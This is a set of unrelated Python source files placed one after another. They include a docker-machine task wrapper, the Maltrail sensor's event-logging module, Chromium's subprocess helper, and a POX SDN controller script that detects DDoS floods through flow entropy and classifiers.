def busy(self):
return not self._idle
def tskProvisionMachine(self, allowed_to_fail=True):
"""
Schedule task to provision remote machine
"""
params = []
for key, value in self._config.items():
params.append('--' + key)
params.append(value)
params.append(self.name())
self.add_task(DockerMachineTask(name='provisionMachine',
cwd=self.cwd(),
cmd='create',
params=params,
allowed_to_fail=allowed_to_fail))
def tskStartMachine(self, allowed_to_fail=True):
"""
Schedule task to start remote machine
"""
self.add_task(DockerMachineTask(name='startMachine',
cwd=self.cwd(),
cmd='start',
params=[self.name()],
allowed_to_fail=allowed_to_fail))
def tskStopMachine(self, allowed_to_fail=True):
"""
Schedule task to stop remote machine
"""
self.add_task(DockerMachineTask(name='stopMachine',
cwd=self.cwd(),
cmd='stop',
params=[self.name()],
allowed_to_fail=allowed_to_fail))
def tskKillMachine(self, allowed_to_fail=True):
"""
Schedule task to stop remote machine (forces stop)
"""
self.add_task(DockerMachineTask(name='killMachine',
cwd=self.cwd(),
cmd='kill',
params=[self.name()],
allowed_to_fail=allowed_to_fail))
def tskRemoveMachine(self):
"""
Schedule task to completely remove machine locally and remotely
"""
self.add_task(DockerMachineTask(name='removeMachine',
cwd=self.cwd(),
cmd='rm',
params=['-f', '-y', self.name()]))
def tskGetMachineEnv(self):
"""
Schedule task to get remote machine environment
"""
def cb(text):
self._machine_env = self._parse_env_text(input=text)
self.add_task(DockerMachineTask(name='getMachineEnv',
cwd=self.cwd(),
cmd='env',
params=[self.name()],
output_cb=cb))
def tskGetMachineStatus(self):
"""
Schedule task to get remote machine status
"""
def cb(text):
self._machine_status = text
self.add_task(DockerMachineTask(name='getMachineStatus',
cwd=self.cwd(),
cmd='status',
params=[self.name()],
output_cb=cb))
def tskGetMachineIp(self):
"""
Schedule task to get remote machine IP
"""
def cb(text):
self._machine_ip = text
self.add_task(DockerMachineTask(name='getMachineIp',
cwd=self.cwd(),
cmd='ip',
params=[self.name()],
output_cb=cb))
def tskSecureCopyToMachine(self, src, dst):
"""
Schedule secure copy task
"""
self.add_task(DockerMachineTask(name='secureCopy',
cwd=self.cwd(),
cmd='scp',
params=['-r', src, self.name() + ':' + dst]))
def tskSecureCopyFromMachine(self, src, dst):
"""
Schedule secure copy task
"""
self.add_task(DockerMachineTask(name='secureCopy',
cwd=self.cwd(),
cmd='scp',
params=['-r', self.name() + ':' + src, dst]))
def tskRunServices(self, timeout=None):
"""
Schedule task to run remote machine services (docker-compose up)
"""
self.add_task(DockerMachineTask(name='runServices',
cwd=self.cwd(),
bin='docker-compose',
cmd='up',
params=[],
timeout=timeout))
def tskStartServices(self):
"""
Schedule task to run remote machine services in background (docker-compose up -d)
"""
self.add_task(DockerMachineTask(name='startServices',
cwd=self.cwd(),
bin='docker-compose',
cmd='up',
params=['-d']))
def tskGetServiceLogs(self):
"""
Schedule task to get remote machine service logs
"""
def cb(text):
self._service_logs = text
self.add_task(DockerMachineTask(name='getServiceLogs',
cwd=self.cwd(),
bin='docker-compose',
cmd='logs',
params=['--tail=256'],
output_cb=cb))
|
log.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import datetime
import os
import re
import signal
import socket
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.compat import xrange
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import UNICODE_ENCODING
from core.settings import VERSION
from core.ignore import ignore_event
from thirdparty.six.moves import socketserver as _socketserver
_condensed_events = {}
_condensing_thread = None
_condensing_lock = threading.Lock()
_thread_data = threading.local()
def create_log_directory():
if not os.path.isdir(config.LOG_DIR):
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please rerun with sudo/Administrator privileges")
os.makedirs(config.LOG_DIR, 0o755)
print("[i] using '%s' for log storage" % config.LOG_DIR)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
retval = None
localtime = time.localtime(sec)
_ = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
if not reuse:
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
retval = os.open(_, flags)
else:
if _ != getattr(_thread_data, "event_log_path", None):
if getattr(_thread_data, "event_log_handle", None):
try:
os.close(_thread_data.event_log_handle)
except OSError:
pass
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
_thread_data.event_log_path = _
_thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)
retval = _thread_data.event_log_handle
return retval
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
if not hasattr(_thread_data, "error_log_handle"):
_ = os.path.join(config.get("LOG_DIR") or os.curdir, "error.log")
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_ERROR_LOG_PERMISSIONS)
_thread_data.error_log_path = _
_thread_data.error_log_handle = os.open(_thread_data.error_log_path, flags)
return _thread_data.error_log_handle
def safe_value(value):
retval = str(value or '-')
if any(_ in retval for _ in (' ', '"')):
retval = "\"%s\"" % retval.replace('"', '""')
retval = re.sub(r"[\x0a\x0d]", " ", retval)
return retval
def flush_condensed_events():
while True:
time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
with _condensing_lock:
for key in _condensed_events:
condensed = False
events = _condensed_events[key]
first_event = events[0]
condensed_event = [_ for _ in first_event]
for i in xrange(1, len(events)):
current_event = events[i]
for j in xrange(3, 7): # src_port, dst_ip, dst_port, proto
if current_event[j] != condensed_event[j]:
condensed = True
if not isinstance(condensed_event[j], set):
condensed_event[j] = set((condensed_event[j],))
condensed_event[j].add(current_event[j])
if condensed:
for i in xrange(len(condensed_event)):
if isinstance(condensed_event[i], set):
condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))
log_event(condensed_event, skip_condensing=True)
_condensed_events.clear()
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
global _condensing_thread
if _condensing_thread is None:
_condensing_thread = threading.Thread(target=flush_condensed_events)
_condensing_thread.daemon = True
_condensing_thread.start()
try:
sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
if ignore_event(event_tuple):
return
if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS): # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
if not skip_write:
localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
if not skip_condensing:
if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
with _condensing_lock:
key = (src_ip, trail)
if key not in _condensed_events:
_condensed_events[key] = []
_condensed_events[key].append(event_tuple)
return
current_bucket = sec // config.PROCESS_COUNT
if getattr(_thread_data, "log_bucket", None) != current_bucket: # log throttling
_thread_data.log_bucket = current_bucket
_thread_data.log_trails = set()
else:
if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
return
else:
_thread_data.log_trails.add((src_ip, trail))
_thread_data.log_trails.add((dst_ip, trail))
event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
if not config.DISABLE_LOCAL_LOG_STORAGE:
handle = get_event_log_handle(sec)
os.write(handle, event.encode(UNICODE_ENCODING))
if config.LOG_SERVER:
if config.LOG_SERVER.count(':') > 1:
remote_host, remote_port = config.LOG_SERVER.replace('[', '').replace(']', '').rsplit(':', 1)
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(remote_host, int(remote_port) if str(remote_port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
remote_host, remote_port = config.LOG_SERVER.split(':')
_address = (remote_host, int(remote_port))
s = socket.socket(socket.AF_INET if len(_address) == 2 else socket.AF_INET6, socket.SOCK_DGRAM)
s.sendto(("%s %s" % (sec, event)).encode(UNICODE_ENCODING), _address)
if config.SYSLOG_SERVER:
extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
_ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(config.TRAILS_FILE))), name=info, severity=0, extension=extension)
remote_host, remote_port = config.SYSLOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(_.encode(UNICODE_ENCODING), (remote_host, int(remote_port)))
if (config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER))) or config.console:
sys.stderr.write(event)
sys.stderr.flush()
if config.plugin_functions:
for _ in config.plugin_functions:
_(event_tuple, packet)
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def log_error(msg):
try:
handle = get_error_log_handle()
os.write(handle, ("%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg)).encode(UNICODE_ENCODING))
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def start_logd(address=None, port=None, join=False):
class ThreadingUDPServer(_socketserver.ThreadingMixIn, _socketserver.UDPServer):
pass
class UDPHandler(_socketserver.BaseRequestHandler):
def handle(self):
try:
data, _ = self.request
if data[0:1].isdigit(): # Note: regular format with timestamp in front
sec, event = data.split(b' ', 1)
else: # Note: naive format without timestamp in front
event_date = datetime.datetime.strptime(data[1:data.find(b'.')].decode(UNICODE_ENCODING), TIME_FORMAT)
sec = int(time.mktime(event_date.timetuple()))
event = data
if not event.endswith(b'\n'):
event = b"%s\n" % event
handle = get_event_log_handle(int(sec), reuse=False)
os.write(handle, event)
os.close(handle)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
_socketserver.UDPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
server = ThreadingUDPServer(_address, UDPHandler)
print("[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1]))
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
def set_sigterm_handler():
def handler(signum, frame):
log_error("SIGTERM")
raise SystemExit
if hasattr(signal, "SIGTERM"):
signal.signal(signal.SIGTERM, handler)
if __name__ != "__main__":
set_sigterm_handler()
|
main.py
|
from multiprocessing import Process
import api
import reisapi
if __name__ == '__main__':
# Start API
api = Process(target=api.run)
api.start()
reis = Process(target=reisapi.run)
reis.start()
api.join()
reis.join()
|
subprocess2.py
|
# coding=utf8
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Collection of subprocess wrapper functions.
In theory you shouldn't need anything else in subprocess, or this module failed.
"""
import codecs
import errno
import io
import logging
import os
try:
import Queue
except ImportError: # For Py3 compatibility
import queue as Queue
import subprocess
import sys
import time
import threading
# Cache the string-escape codec to ensure subprocess can find it later.
# See crbug.com/912292#c2 for context.
if sys.version_info.major == 2:
codecs.lookup('string-escape')
# TODO(crbug.com/953884): Remove this when python3 migration is done.
try:
basestring
except NameError:
# pylint: disable=redefined-builtin
basestring = str
# Constants forwarded from subprocess.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
# Sends stdout or stderr to os.devnull.
VOID = object()
# Error code when a process was killed because it timed out.
TIMED_OUT = -2001
# Globals.
# Set to True if you somehow need to disable this hack.
SUBPROCESS_CLEANUP_HACKED = False
class CalledProcessError(subprocess.CalledProcessError):
"""Augment the standard exception with more data."""
def __init__(self, returncode, cmd, cwd, stdout, stderr):
super(CalledProcessError, self).__init__(returncode, cmd, output=stdout)
self.stdout = self.output # for backward compatibility.
self.stderr = stderr
self.cwd = cwd
def __str__(self):
out = 'Command %r returned non-zero exit status %s' % (
' '.join(self.cmd), self.returncode)
if self.cwd:
out += ' in ' + self.cwd
return '\n'.join(filter(None, (out, self.stdout, self.stderr)))
class CygwinRebaseError(CalledProcessError):
"""Occurs when cygwin's fork() emulation fails due to rebased dll."""
## Utility functions
def kill_pid(pid):
"""Kills a process by its process id."""
try:
# Unable to import 'module'
# pylint: disable=no-member,F0401
import signal
return os.kill(pid, signal.SIGKILL)
except ImportError:
pass
def kill_win(process):
"""Kills a process with its windows handle.
Has no effect on other platforms.
"""
try:
# Unable to import 'module'
# pylint: disable=import-error
import win32process
# Access to a protected member _handle of a client class
# pylint: disable=protected-access
return win32process.TerminateProcess(process._handle, -1)
except ImportError:
pass
def add_kill():
"""Adds kill() method to subprocess.Popen for python <2.6"""
if hasattr(subprocess.Popen, 'kill'):
return
if sys.platform == 'win32':
subprocess.Popen.kill = kill_win
else:
subprocess.Popen.kill = lambda process: kill_pid(process.pid)
def hack_subprocess():
"""subprocess functions may throw exceptions when used in multiple threads.
See http://bugs.python.org/issue1731717 for more information.
"""
global SUBPROCESS_CLEANUP_HACKED
if not SUBPROCESS_CLEANUP_HACKED and threading.activeCount() != 1:
# Only hack if there is ever multiple threads.
# There is no point to leak with only one thread.
subprocess._cleanup = lambda: None
SUBPROCESS_CLEANUP_HACKED = True
def get_english_env(env):
"""Forces LANG and/or LANGUAGE to be English.
Forces encoding to utf-8 for subprocesses.
Returns None if it is unnecessary.
"""
if sys.platform == 'win32':
return None
env = env or os.environ
# Test if it is necessary at all.
is_english = lambda name: env.get(name, 'en').startswith('en')
if is_english('LANG') and is_english('LANGUAGE'):
return None
# Requires modifications.
env = env.copy()
def fix_lang(name):
if not is_english(name):
env[name] = 'en_US.UTF-8'
fix_lang('LANG')
fix_lang('LANGUAGE')
return env
class NagTimer(object):
"""
Triggers a callback when a time interval passes without an event being fired.
For example, the event could be receiving terminal output from a subprocess;
and the callback could print a warning to stderr that the subprocess appeared
to be hung.
"""
def __init__(self, interval, cb):
self.interval = interval
self.cb = cb
self.timer = threading.Timer(self.interval, self.fn)
self.last_output = self.previous_last_output = 0
def start(self):
self.last_output = self.previous_last_output = time.time()
self.timer.start()
def event(self):
self.last_output = time.time()
def fn(self):
now = time.time()
if self.last_output == self.previous_last_output:
self.cb(now - self.previous_last_output)
# Use 0.1 fudge factor, just in case
# (self.last_output - now) is very close to zero.
sleep_time = (self.last_output - now - 0.1) % self.interval
self.previous_last_output = self.last_output
self.timer = threading.Timer(sleep_time + 0.1, self.fn)
self.timer.start()
def cancel(self):
self.timer.cancel()
class Popen(subprocess.Popen):
"""Wraps subprocess.Popen() with various workarounds.
- Forces English output since it's easier to parse the stdout if it is always
in English.
- Sets shell=True on windows by default. You can override this by forcing
shell parameter to a value.
- Adds support for VOID to not buffer when not needed.
- Adds self.start property.
Note: Popen() can throw OSError when cwd or args[0] doesn't exist. Translate
exceptions generated by cygwin when it fails trying to emulate fork().
"""
# subprocess.Popen.__init__() is not threadsafe; there is a race between
# creating the exec-error pipe for the child and setting it to CLOEXEC during
# which another thread can fork and cause the pipe to be inherited by its
# descendents, which will cause the current Popen to hang until all those
# descendents exit. Protect this with a lock so that only one fork/exec can
# happen at a time.
popen_lock = threading.Lock()
def __init__(self, args, **kwargs):
# Make sure we hack subprocess if necessary.
hack_subprocess()
add_kill()
env = get_english_env(kwargs.get('env'))
if env:
kwargs['env'] = env
if kwargs.get('shell') is None:
# *Sigh*: Windows needs shell=True, or else it won't search %PATH% for
# the executable, but shell=True makes subprocess on Linux fail when it's
# called with a list because it only tries to execute the first item in
# the list.
kwargs['shell'] = bool(sys.platform=='win32')
if isinstance(args, basestring):
tmp_str = args
elif isinstance(args, (list, tuple)):
tmp_str = ' '.join(args)
else:
raise CalledProcessError(None, args, kwargs.get('cwd'), None, None)
if kwargs.get('cwd', None):
tmp_str += '; cwd=%s' % kwargs['cwd']
logging.debug(tmp_str)
self.stdout_cb = None
self.stderr_cb = None
self.stdin_is_void = False
self.stdout_is_void = False
self.stderr_is_void = False
self.cmd_str = tmp_str
if kwargs.get('stdin') is VOID:
kwargs['stdin'] = open(os.devnull, 'r')
self.stdin_is_void = True
for stream in ('stdout', 'stderr'):
if kwargs.get(stream) in (VOID, os.devnull):
kwargs[stream] = open(os.devnull, 'w')
setattr(self, stream + '_is_void', True)
if callable(kwargs.get(stream)):
setattr(self, stream + '_cb', kwargs[stream])
kwargs[stream] = PIPE
self.start = time.time()
self.timeout = None
self.nag_timer = None
self.nag_max = None
self.shell = kwargs.get('shell', None)
# Silence pylint on MacOSX
self.returncode = None
try:
with self.popen_lock:
super(Popen, self).__init__(args, **kwargs)
except OSError as e:
if e.errno == errno.EAGAIN and sys.platform == 'cygwin':
# Convert fork() emulation failure into a CygwinRebaseError().
raise CygwinRebaseError(
e.errno,
args,
kwargs.get('cwd'),
None,
'Visit '
'http://code.google.com/p/chromium/wiki/CygwinDllRemappingFailure '
'to learn how to fix this error; you need to rebase your cygwin '
'dlls')
# Popen() can throw OSError when cwd or args[0] doesn't exist.
raise OSError('Execution failed with error: %s.\n'
'Check that %s or %s exist and have execution permission.'
% (str(e), kwargs.get('cwd'), args[0]))
def _tee_threads(self, input): # pylint: disable=redefined-builtin
"""Does I/O for a process's pipes using threads.
It's the simplest and slowest implementation. Expect very slow behavior.
If there is a callback and it doesn't keep up with the calls, the timeout
effectiveness will be delayed accordingly.
"""
# Queue of either of <threadname> when done or (<threadname>, data). In
# theory we would like to limit to ~64kb items to not cause large memory
# usage when the callback blocks. It is not done because it slows down
# processing on OSX10.6 by a factor of 2x, making it even slower than
# Windows! Revisit this decision if it becomes a problem, e.g. crash
# because of memory exhaustion.
queue = Queue.Queue()
done = threading.Event()
nag = None
def write_stdin():
try:
stdin_io = io.BytesIO(input)
while True:
data = stdin_io.read(1024)
if data:
self.stdin.write(data)
else:
self.stdin.close()
break
finally:
queue.put('stdin')
def _queue_pipe_read(pipe, name):
"""Queues characters read from a pipe into a queue."""
try:
while True:
data = pipe.read(1)
if not data:
break
if nag:
nag.event()
queue.put((name, data))
finally:
queue.put(name)
def timeout_fn():
try:
done.wait(self.timeout)
finally:
queue.put('timeout')
def wait_fn():
try:
self.wait()
finally:
queue.put('wait')
# Starts up to 5 threads:
# Wait for the process to quit
# Read stdout
# Read stderr
# Write stdin
# Timeout
threads = {
'wait': threading.Thread(target=wait_fn),
}
if self.timeout is not None:
threads['timeout'] = threading.Thread(target=timeout_fn)
if self.stdout_cb:
threads['stdout'] = threading.Thread(
target=_queue_pipe_read, args=(self.stdout, 'stdout'))
if self.stderr_cb:
threads['stderr'] = threading.Thread(
target=_queue_pipe_read, args=(self.stderr, 'stderr'))
if input:
threads['stdin'] = threading.Thread(target=write_stdin)
elif self.stdin:
# Pipe but no input, make sure it's closed.
self.stdin.close()
for t in threads.itervalues():
t.start()
if self.nag_timer:
def _nag_cb(elapsed):
logging.warn(' No output for %.0f seconds from command:' % elapsed)
logging.warn(' %s' % self.cmd_str)
if (self.nag_max and
int('%.0f' % (elapsed / self.nag_timer)) >= self.nag_max):
queue.put('timeout')
done.set() # Must do this so that timeout thread stops waiting.
nag = NagTimer(self.nag_timer, _nag_cb)
nag.start()
timed_out = False
try:
# This thread needs to be optimized for speed.
while threads:
item = queue.get()
if item[0] == 'stdout':
self.stdout_cb(item[1])
elif item[0] == 'stderr':
self.stderr_cb(item[1])
else:
# A thread terminated.
if item in threads:
threads[item].join()
del threads[item]
if item == 'wait':
# Terminate the timeout thread if necessary.
done.set()
elif item == 'timeout' and not timed_out and self.poll() is None:
logging.debug('Timed out after %.0fs: killing' % (
time.time() - self.start))
self.kill()
timed_out = True
finally:
# Stop the threads.
done.set()
if nag:
nag.cancel()
if 'wait' in threads:
# Accelerate things, otherwise it would hang until the child process is
# done.
logging.debug('Killing child because of an exception')
self.kill()
# Join threads.
for thread in threads.itervalues():
thread.join()
if timed_out:
self.returncode = TIMED_OUT
# pylint: disable=arguments-differ,W0622
def communicate(self, input=None, timeout=None, nag_timer=None,
nag_max=None):
"""Adds timeout and callbacks support.
Returns (stdout, stderr) like subprocess.Popen().communicate().
- The process will be killed after |timeout| seconds and returncode set to
TIMED_OUT.
- If the subprocess runs for |nag_timer| seconds without producing terminal
output, print a warning to stderr.
"""
self.timeout = timeout
self.nag_timer = nag_timer
self.nag_max = nag_max
if (not self.timeout and not self.nag_timer and
not self.stdout_cb and not self.stderr_cb):
return super(Popen, self).communicate(input)
if self.timeout and self.shell:
raise TypeError(
'Using timeout and shell simultaneously will cause a process leak '
'since the shell will be killed instead of the child process.')
stdout = None
stderr = None
# Convert to a lambda to workaround python's deadlock.
# http://docs.python.org/library/subprocess.html#subprocess.Popen.wait
# When the pipe fills up, it would deadlock this process.
if self.stdout and not self.stdout_cb and not self.stdout_is_void:
stdout = []
self.stdout_cb = stdout.append
if self.stderr and not self.stderr_cb and not self.stderr_is_void:
stderr = []
self.stderr_cb = stderr.append
self._tee_threads(input)
if stdout is not None:
stdout = ''.join(stdout)
if stderr is not None:
stderr = ''.join(stderr)
return (stdout, stderr)
def communicate(args, timeout=None, nag_timer=None, nag_max=None, **kwargs):
"""Wraps subprocess.Popen().communicate() and add timeout support.
Returns ((stdout, stderr), returncode).
- The process will be killed after |timeout| seconds and returncode set to
TIMED_OUT.
- If the subprocess runs for |nag_timer| seconds without producing terminal
output, print a warning to stderr.
- Automatically passes stdin content as input so do not specify stdin=PIPE.
"""
stdin = kwargs.pop('stdin', None)
if stdin is not None:
if isinstance(stdin, basestring):
# When stdin is passed as an argument, use it as the actual input data and
# set the Popen() parameter accordingly.
kwargs['stdin'] = PIPE
else:
kwargs['stdin'] = stdin
stdin = None
proc = Popen(args, **kwargs)
if stdin:
return proc.communicate(stdin, timeout, nag_timer), proc.returncode
else:
return proc.communicate(None, timeout, nag_timer), proc.returncode
def call(args, **kwargs):
"""Emulates subprocess.call().
Automatically convert stdout=PIPE or stderr=PIPE to VOID.
In no case they can be returned since no code path raises
subprocess2.CalledProcessError.
"""
if kwargs.get('stdout') == PIPE:
kwargs['stdout'] = VOID
if kwargs.get('stderr') == PIPE:
kwargs['stderr'] = VOID
return communicate(args, **kwargs)[1]
def check_call_out(args, **kwargs):
"""Improved version of subprocess.check_call().
Returns (stdout, stderr), unlike subprocess.check_call().
"""
out, returncode = communicate(args, **kwargs)
if returncode:
raise CalledProcessError(
returncode, args, kwargs.get('cwd'), out[0], out[1])
return out
def check_call(args, **kwargs):
"""Emulate subprocess.check_call()."""
check_call_out(args, **kwargs)
return 0
def capture(args, **kwargs):
"""Captures stdout of a process call and returns it.
Returns stdout.
- Discards returncode.
- Blocks stdin by default if not specified since no output will be visible.
"""
kwargs.setdefault('stdin', VOID)
# Like check_output, deny the caller from using stdout arg.
return communicate(args, stdout=PIPE, **kwargs)[0][0]
def check_output(args, **kwargs):
"""Emulates subprocess.check_output().
Captures stdout of a process call and returns stdout only.
- Throws if return code is not 0.
- Works even prior to python 2.7.
- Blocks stdin by default if not specified since no output will be visible.
- As per doc, "The stdout argument is not allowed as it is used internally."
"""
kwargs.setdefault('stdin', VOID)
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it would be overridden.')
return check_call_out(args, stdout=PIPE, **kwargs)[0]
|
handle_flow.py
|
#!/usr/bin/python
# standard includes
from pox.core import core
import time as t
import pickle
import pandas as pd
import numpy as np
import threading
# import minisom
import local_outlier_factor as lof_alg
import detect_udp_attack
import detect_tcp_syn
import Backprop
import mode
# include as part of the betta branch
from pox.openflow.of_json import *
global packets, statistic, ip, count
packets = pd.DataFrame([])
count = 0
log = core.getLogger()
knn = detect_udp_attack.knn
tcp_syn = detect_tcp_syn.knn
parameters = Backprop.neural
mod = mode.mod
# handler for timer function that sends the requests to all the
# switches connected to the controller.
def _timer_func ():
for connection in core.openflow._connections.values():
connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
log.debug("Sent %i flow/port stats request(s)", len(core.openflow._connections))
def calculate_Entropy(df):
# print("count=",count)
prob = df/df.sum(axis=0)
entropy = (-prob*np.log2(prob)).sum()
return entropy
# Using this function to detect UDP attack
def normalize(vector):
for i in vector.index:
vector[i] = (vector[i] - min_feature[i])/(max_feature[i] - min_feature[i])
# Using this dunction to detect ICMP attack
def normalize_icmp(vector):
for i in vector.index:
vector[i] = (vector[i] - min_feature_icmp[i])/ (max_feature_icmp[i] - min_feature_icmp[i])
# Normalize feature in anomaly detection - Using algorithm: Local outlier factor
def normalize_minmax(vector):
for i in vector.index:
vector[i] = (vector[i] - std[i])/ (mean[i] - std[i])
# handler to display flow statistics received in JSON format
# structure of event.stats is defined by ofp_flow_stats()
def _handle_flowstats_received (event):
stats = flow_stats_to_list(event.stats)
log.debug("FlowStatsReceived from %s: %s",
dpidToStr(event.connection.dpid), stats)
global cnt, df1, df2, arr1, arr2, change_mode, tcp_activation
if event.connection.dpid:
if change_mode==mod.MODE_NORMAL or \
change_mode==mod.MODE_CLASSIFIER or \
change_mode==mod.MODE_DETECT_ICMP or \
change_mode==mod.MODE_DETECT_UDP:
status(event)
elif change_mode==mod.MODE_DETECT_TCPSYN:
print "detect TCP SYN attack using KNN"
tcp_activation = 1
def status(event):
global cnt, arr1, arr2, df1, df2, change_mode
print "dpid=", event.connection.dpid
# print stats
print "************************************************"
n1 = t.time() ###########################n1#####################
flowtable = []
for f in event.stats:
flowtable.append([f.packet_count,
str(f.match.nw_src),
str(f.match.nw_dst),
str(f.match.tp_src),
str(f.match.tp_dst),
f.match.nw_proto])
lenFlow = len(flowtable)
n2 = t.time() ###########################n2-n1 = getflow#####################
print "n2-n1=", n2 - n1
if (lenFlow != 0) and (cnt < 1):
print'cnt=', cnt
cnt = cnt + 1
arr1 = np.array(flowtable)
df1 = pd.DataFrame(arr1, columns=['total_pkt',
'ip_src',
'ip_dst',
'port_src',
'port_dst',
'proto'])
df1['total_pkt'] = df1['total_pkt'].astype(np.float)
elif (lenFlow != 0) and (cnt >= 1):
n3 = t.time() ######################################################### n3 ########
print('cnt=', cnt)
cnt = cnt + 1
arr2 = np.array(flowtable)
df2 = pd.DataFrame(arr2, columns=['total_pkt',
'ip_src',
'ip_dst',
'port_src',
'port_dst',
'proto'])
new_flows = pd.DataFrame(columns=['ip_src', 'total_pkt'])
df2['total_pkt'] = df2['total_pkt'].astype(np.float)
########### add diff IP_src,IP_dst
################ v.2 #######################
df1.set_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
df2.set_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
s = df2.loc[df2.index.difference(df1.index), :]
s.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
# s.drop(['ip_dst', 'port_src', 'port_dst', 'proto'], axis=1, inplace=True)
new_flows = new_flows.append(s)
# total packet new > total packet old => new flow => add
common = df2.index.intersection(df1.index)
s = df2.loc[common]
s1 = s - df1.loc[common]
s2 = s1[s1['total_pkt'] > 0]
s2.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
# s2.drop(['ip_dst', 'port_src', 'port_dst', 'proto'], axis=1, inplace=True)
new_flows = new_flows.append(s)
# total packet new < total packet old => new flow => add
s = s[s1['total_pkt'] < 0]
s.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
# s.drop(['ip_dst', 'port_src', 'port_dst', 'proto'], axis=1, inplace=True)
new_flows = new_flows.append(s)
# print "hung", new_flows
df1.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
df2.reset_index(['ip_src', 'ip_dst', 'port_src', 'port_dst', 'proto'], inplace=True)
print "NUMBER OF NEW FLOWS = ", len(new_flows)
ent_ip_src = calculate_Entropy(new_flows.groupby(['ip_src'])['total_pkt'].sum())
total_packets = new_flows['total_pkt'].sum()
# print "Hung", new_flows
# Mode normal - processing with local outlier factor
if change_mode == mod.MODE_NORMAL:
feature_vector = pd.Series([ent_ip_src, total_packets], index=['ent_ip_src', 'total_packets'])
print "Feature list \n ", feature_vector
normalize_minmax(feature_vector)
# print "Feature list \n ", feature_vector
tobe_classifed = feature_vector.values
change_mode = lof_alg.lof1.predict(tobe_classifed)[0]
if change_mode == 0:
print "Network is safe"
# mode classifier
if change_mode==mod.MODE_CLASSIFIER:
print "Dangerous!!!!\nDangerous!!!!\nChange controller to mode classification"
new_flows['proto'] = new_flows['proto'].astype(np.float)
classifier = new_flows.groupby('proto')['total_pkt'].sum()
classifier = classifier.loc[[1, 17, 6]]
if classifier.loc[1] > mod.THRESHOLD_ICMP:
change_mode = mod.MODE_DETECT_ICMP
print "Suspect ICMP attack - change controller to mode detect ICMP attack"
